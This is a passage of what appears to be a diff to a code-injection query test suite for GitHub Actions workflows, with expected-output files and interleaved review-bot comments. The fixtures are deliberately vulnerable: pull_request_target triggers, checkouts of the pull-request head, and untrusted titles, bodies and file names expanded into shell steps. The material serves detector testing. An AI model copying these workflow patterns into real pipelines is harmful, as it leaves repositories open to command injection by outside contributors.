.github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | nodes -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | -| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | -| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | -| .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | -| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | -| .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n 
| -| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | +| .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | +| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | +| .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | +| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | +| .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" 
config.json\n | +| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml index 153ebc5b733..5aeb9aac7c5 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml 
@@ -1,26 +1,29 @@ -on: push +on: + pull_request_target: + +permissions: + actions: write jobs: job1: runs-on: ubuntu-latest - outputs: job_output: ${{ steps.step5.outputs.MSG5 }} steps: - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} - id: step0 uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event['head_commit']['message'] }} + source: ${{ github.event['pull_request']['body'] }} find: 'foo' replace: '' - id: step1 env: BODY: ${{ steps.step0.outputs.value}} - shell: powershell - run: | - Write-Output "::set-output name=MSG::$ENV{BODY}" + run: echo "::set-output name=MSG::${BODY}" - id: step2 env: MSG: ${{steps.step1.outputs.MSG}} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml index 3cab86f3171..d149df2bd7c 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml @@ -19,7 +19,9 @@ jobs: uses: actions/checkout@v4 - name: Extract Jira Key - run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + env: + TITLE: ${{ github.event.pull_request.title }} + run: echo ISSUE_KEY=$(echo "$TITLE") >> $GITHUB_ENV - name: Sink run: echo ${{ env.ISSUE_KEY }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml new file mode 100644 index 00000000000..6d925a82d37 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml 
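Review bot: Replacing the `shell: powershell` step with `run: echo "::set-output name=MSG::${BODY}"` leaves this fixture without any non-bash step, so the step0 → step1 flow that the previous expected output tracked through PowerShell is no longer exercised. If that shell is meant to stay covered, it should survive as its own step or fixture rather than be dropped. The new `pull_request_target` trigger, `permissions: actions: write` and the checkout of `github.event.pull_request.head.ref` presumably exist to make the workflow count as privileged for the critical-severity query. A leading comment such as `# fixture: intentionally vulnerable (privileged trigger + PR-head checkout); not a template` would record that. job1 continues past the end of the hunk.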
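Review bot: The `Extract Jira Key` step now passes the title through `env: TITLE`, but the value is still written to `$GITHUB_ENV` and re-expanded by `${{ env.ISSUE_KEY }}` in the `Sink` step, and nothing in the file says which route is under test. The fixture therefore appears to stay injectable by a different path than before the change. A comment above the step, for example `# title -> $GITHUB_ENV -> env.ISSUE_KEY: the finding is expected at the Sink step`, would keep a later reader from taking the env indirection for the fix. The enclosing job starts above the hunk, so its trigger is not visible here.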
@@ -0,0 +1,51 @@
+name: Pull Request Open
+
+on:
+ pull_request_target:
+
+jobs:
+ test1:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - id: changed-files
+ run: |
+ echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.changed-files.outputs.files }}"
+ test2:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - id: changed-files
+ run: |
+ FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)
+ echo "files=${FILES}" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.changed-files.outputs.files }}"
+ test3:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - id: changed-files
+ run: |
+ echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"
+ - run: echo "${{ env.CHANGED-FILES }}"
+ test4:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - id: changed-files
+ run: |
+ FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)
+ echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"
+ - run: echo "${{ env.CHANGED-FILES }}"
+
+
+
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml
new file mode 100644
index 00000000000..a39967760e8
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml
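Review bot: All four jobs (test1 to test4) are positive cases, so this fixture pins only that the query fires, never that a safe form stays unreported. The same holds for test15.yml, which has the same four-job shape. A fifth job that hands the step output to the shell through `env:` would cover the negative side, for example `env:` with `FILES: ${{ steps.changed-files.outputs.files }}` followed by `run: echo "$FILES"`. It would also help to say in a comment where the taint is expected to come from, presumably the file names `git diff-tree` returns after the checkout of `github.event.pull_request.head.sha`, rather than the `${{ github.sha }}` argument.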
@@ -0,0 +1,38 @@
+name: Pull Request Open
+
+on:
+ pull_request_target:
+
+jobs:
+ test1:
+ runs-on: ubuntu-latest
+ steps:
+ - id: title
+ run: |
+ echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.title.outputs.title }}"
+ test2:
+ runs-on: ubuntu-latest
+ steps:
+ - id: title
+ run: |
+ PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})
+ echo "title=$PR_TITLE" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.title.outputs.title }}"
+ test3:
+ runs-on: ubuntu-latest
+ steps:
+ - id: title
+ run: |
+ echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"
+ - run: echo "${{ env.TITLE }}"
+ test4:
+ runs-on: ubuntu-latest
+ steps:
+ - id: title
+ run: |
+ PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})
+ echo "TITLE=$PR_TITLE" >> "$GITHUB_ENV"
+ - run: echo "${{ env.TITLE }}"
+
+
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
index 61c851a2cfa..4c9ea8fe8ca 100644
--- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
@@ -19,28 +19,28 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | provenance | | | .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | provenance | | -| .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n 
ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | provenance | | -| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | provenance | | | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | provenance | | -| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | provenance | | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | -| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | -| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | provenance | | -| 
.github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | provenance | | -| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | provenance | | -| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | provenance | | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | provenance | | -| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | provenance | | -| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | provenance | | -| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | provenance | | -| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | provenance | | -| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | provenance | | -| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | provenance | | -| .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | provenance | | +| .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | provenance | | +| .github/workflows/test14.yml:24:14:26:52 | FILES=$(git 
diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | provenance | | +| .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | provenance | | +| .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | provenance | | +| .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | provenance | | +| .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | provenance | | +| .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | provenance | | +| .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | provenance | | +| .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | provenance | | +| .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | provenance | | +| .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | provenance | | +| .github/workflows/test15.yml:26:14:27:100 | echo 
"TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | provenance | | +| .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | provenance | | +| .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | provenance | | +| .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | +| .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | +| .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | provenance | | +| .github/workflows/test.yml:23:9:27:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:29:19:29:46 | steps.step1.outputs.MSG | provenance | | +| .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | .github/workflows/test.yml:23:9:27:6 | Run Step: step1 [MSG] | provenance | | +| .github/workflows/test.yml:27:9:31:6 | Run Step: step2 [MSG2] | .github/workflows/test.yml:33:20:33:48 | steps.step2.outputs.MSG2 | provenance | | +| .github/workflows/test.yml:29:19:29:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:27:9:31:6 | Run Step: step2 [MSG2] | provenance | | +| .github/workflows/test.yml:31:9:35:6 | Run Step: step3 [MSG3] | .github/workflows/test.yml:37:20:37:48 | steps.step3.outputs.MSG3 | provenance | | +| .github/workflows/test.yml:33:20:33:48 | steps.step2.outputs.MSG2 | 
.github/workflows/test.yml:31:9:35:6 | Run Step: step3 [MSG3] | provenance | | +| .github/workflows/test.yml:35:9:39:6 | Run Step: step4 [MSG4] | .github/workflows/test.yml:41:20:41:48 | steps.step4.outputs.MSG4 | provenance | | +| .github/workflows/test.yml:37:20:37:48 | steps.step3.outputs.MSG3 | .github/workflows/test.yml:35:9:39:6 | Run Step: step4 [MSG4] | provenance | | +| .github/workflows/test.yml:39:9:44:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | provenance | | +| .github/workflows/test.yml:41:20:41:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:39:9:44:2 | Run Step: step5 [MSG5] | provenance | | +| .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | -| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | semmle.label | github.event.changes.body.from | | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | semmle.label | 
github.event.changes.head.ref.from | | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | semmle.label | toJson(github.event.changes) | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | -| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | -| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | semmle.label | Run Step: step2 [MSG2] | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | semmle.label | Run Step: step3 [MSG3] | -| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | semmle.label | steps.step2.outputs.MSG2 | -| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | semmle.label | Run Step: step4 [MSG4] | -| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | semmle.label | steps.step3.outputs.MSG3 | -| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | semmle.label | Run Step: step5 [MSG5] | -| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | semmle.label | steps.step4.outputs.MSG4 | -| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | +| .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | semmle.label | Run Step: changed-files [files] | +| 
.github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | semmle.label | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | semmle.label | steps.changed-files.outputs.files | +| .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | semmle.label | Run Step: changed-files [files] | +| .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | semmle.label | steps.changed-files.outputs.files | +| .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | semmle.label | Job: test3 [CHANGED-FILES] | +| .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | semmle.label | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | semmle.label | env.CHANGED-FILES | +| .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | semmle.label | Job: test4 [CHANGED-FILES] | +| .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:48:21:48:44 | 
